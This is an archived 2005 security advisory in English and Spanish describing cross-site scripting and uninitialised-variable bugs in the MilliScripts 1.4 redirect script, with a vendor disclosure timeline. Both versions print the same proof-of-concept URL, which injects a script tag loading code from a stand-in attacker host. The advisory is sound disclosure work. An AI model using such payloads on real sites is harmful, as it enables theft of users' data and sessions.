MilliScripts14.txt

2005-12-14T00:00:00
ID PACKETSTORM:42261
Type packetstorm
Reporter Luis Cortes
Modified 2005-12-14T00:00:00

Description

                                        
                                            `  
  
###################################################################  
Full PDF Advisory: http://securitynation.com/files/sndown.php?id=22 english  
http://securitynation.com/files/sndown.php?id=22 spanish  
###################################################################  
  
Multiple Bugs On MilliScripts 1.4 Redirection  
http://www.milliscripts.at  
Date: 01-Diciembre-2005  
Researchers: Luis Alberto Cortes Zavala, Vicente Perez  
  
  
1.-Overview  
  
MilliScripts 1.4 Is a free redirect script for starting your own service of  
subdomains, without any complex configuration at your Server and with so  
many functions. For more information go to www.milliscripts.at  
  
2.-Description  
  
By all the source code there are a lot of bugs that can be found easily,  
more of them are XSS, but is quite possible to have some PHP Injection,  
however, you can lie to a user to try to open some malformed url, with his  
control panel and get some personal information with XSS.  
  
A Basic example is the var $domainname  
  
http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cs  
cript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevalid  
domain.net  
  
So, we have other bugs founded on the code, like this next example, that is  
a var, who decides the program flow, who is not set by when the users call  
the function that is needed:   
  
if($autoappr == "on") { //some code}else{//some code}  
  
$autoappr value is nothing, and is not declared before  
  
  
  
3.- Disclosure Time Line  
Vendor Contacted: 07-December-2005  
Vendor Response: 09-December-2005  
  
Vendor answer: the scripts are quite old, and they haven't been further  
developed since a few years.  
  
  
5.- Copyright  
  
http://www.securitynation.com - Security Nation is a Lab Supported by RISS  
Security Services.  
http://www.riss.com.mx  
luis.cortes@riss.com.mx  
vicente.perez@riss.com.mx  
  
############################################################################  
#################  
Spanish Version of Advisory  
############################################################################  
#################  
  
Multiple Bugs On MilliScripts 1.4 Redirection  
http://www.milliscripts.at  
01-Diciembre-2005  
Investigadores: Luis Alberto Cortes Zavala, Vicente Perez  
  
1.-Vista Previa  
  
MilliScripts 1.4 Es un script que permite abrir tu propio servicio de  
redirección de subdominios, sin alterar registros absolutos en tu servidor,  
es un script potente y con muchas funciones, suficientes par aponer un  
servicio del estilo de cjb.net. Para mas información remitirse al sitio Web  
www.milliscripts.at  
  
2.-Descripción  
  
A lo largo del sistema existen diferentes fallos y múltiples XSS, que son  
fácilmente explotables, siendo este no un problema de inicio se puede  
conseguir que un usuario abra su panel de control y obtener datos  
confidenciales, así mismo no se descarta la posibilidad de inyección remota  
de código PHP.   
  
Un ejemplo básico esta en la variable $domainname que es fácilmente  
explotable:  
  
http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cs  
cript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevalid  
domain.net  
  
Entre otros errores encontrados en el código se denota un ciclo, la  
aplicación tiene la opción de autorizar usuarios nuevos o auto aprobarlos,  
sin embargo en el código no esta correctamente implementado como se denota a  
continuación:  
  
if($autoappr == "on") { //some code}else{//some code}  
  
  
En esta línea de código el flujo del programa se define de acuerdo al valor  
de la variable, cosa que en la revisión del código es errónea ya que la  
variable no tiene ningún valor al ser usada, de hecho ni siquiera existe en  
la pila porque no había sido declarada en ningún momento.  
  
3.- Tiempo de línea de Disclosure  
Contacto con el Desarrollador: 07-Diciembre-2005  
Respuesta del Desarrollador: 09-Diciembre-2005  
  
El script es viejo y esta fuera de mantenimiento, sin embargo podemos  
remitir la información técnica, probablemente saque alguna actualización si  
se encuentra la necesidad.  
  
5.- Copyright  
  
http://www.securitynation.com - Security Nation is a Lab Supported by RISS  
Security Services.  
http://www.riss.com.mx  
luis.cortes@riss.com.mx  
vicente.perez@riss.com.mx  
  
  
`